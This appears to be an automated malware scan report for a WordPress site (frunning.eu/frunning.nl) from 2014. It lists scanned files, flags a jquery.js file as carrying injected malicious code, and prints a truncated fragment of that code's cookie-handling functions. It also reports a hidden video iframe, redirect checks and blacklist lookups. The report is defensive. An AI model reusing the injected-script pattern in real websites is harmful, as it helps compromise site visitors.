Scanned pages/files
Request | Server response | Status |
http://frunning.eu/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 13:24:46 GMT Location: http://www.frunning.nl Server: Apache Content-Length: 291 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.frunning.nl/ | 200 OK Content-Length: 11551 Content-Type: text/html | clean |
http://www.frunning.nl/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 96696 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( jQuery.noConflict(); Antivirus reports:
| ||
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/bootstrap/js/bootstrap.js | 200 OK Content-Length: 61962 Content-Type: application/javascript | clean |
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/jquery.fitvids.js | 200 OK Content-Length: 2644 Content-Type: application/javascript | clean |
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/okvideo.js | 200 OK Content-Length: 9779 Content-Type: application/javascript | suspicious |
Hidden iFrame found. style: hidden src: http://player.vimeo.com/video/ <iframe src="http://player.vimeo.com/video/' + base.options.video.id + '?api=1&js_api=1&title=0&byline=0&portrait=0&playbar=0&loop=' + base.options.loop + '&autoplay=1&player_id=okplayer" frameborder="0" style="' + $(this).attr('style') + 'visibility:hidden;background-color:black;" id="' + $(this).attr('id') + '"> | ||
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/video.js | 200 OK Content-Length: 55392 Content-Type: application/javascript | clean |
http://frunning.eu//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 13:24:54 GMT Location: http://www.frunning.nlajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js/ Server: Apache Content-Length: 353 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.frunning.nlajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js/ | 404 Not Found Content-Length: 1467 Content-Type: text/html | clean |
http://www.frunning.nlajax.googleapis.com//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://www.frunning.nlajax.googleapis.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/bigvideo.js | 200 OK Content-Length: 10081 Content-Type: application/javascript | clean |
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/script.js | 200 OK Content-Length: 37553 Content-Type: application/javascript | clean |
http://www.frunning.nl/wp-content/plugins/seedprod-coming-soon-pro/themes/default/js/modernizr.min.js | 200 OK Content-Length: 5466 Content-Type: application/javascript | clean |
http://frunning.eu//www.google.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 13:24:56 GMT Location: http://www.frunning.nlwww.google.com/ Server: Apache Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.frunning.nlwww.google.com/ | 500 Can't connect to www.frunning.nlwww.google.com:80 (Bad hostname) Content-Length: 190 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frunning.eu
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 10 Oct 2014 13:24:46 GMT
Location: http://www.frunning.nl
Server: Apache
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
...291 bytes of data.
GET / HTTP/1.1
Host: frunning.eu
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 10 Oct 2014 13:24:46 GMT
Location: http://www.frunning.nl
Server: Apache
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
...291 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: frunning.eu
Referer: http://www.google.com/search?q=frunning.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: frunning.eu
Referer: http://www.google.com/search?q=frunning.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frunning.eu
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://frunning.eu/
Result: frunning.eu is not infected or malware details are not published yet.
Result: frunning.eu is not infected or malware details are not published yet.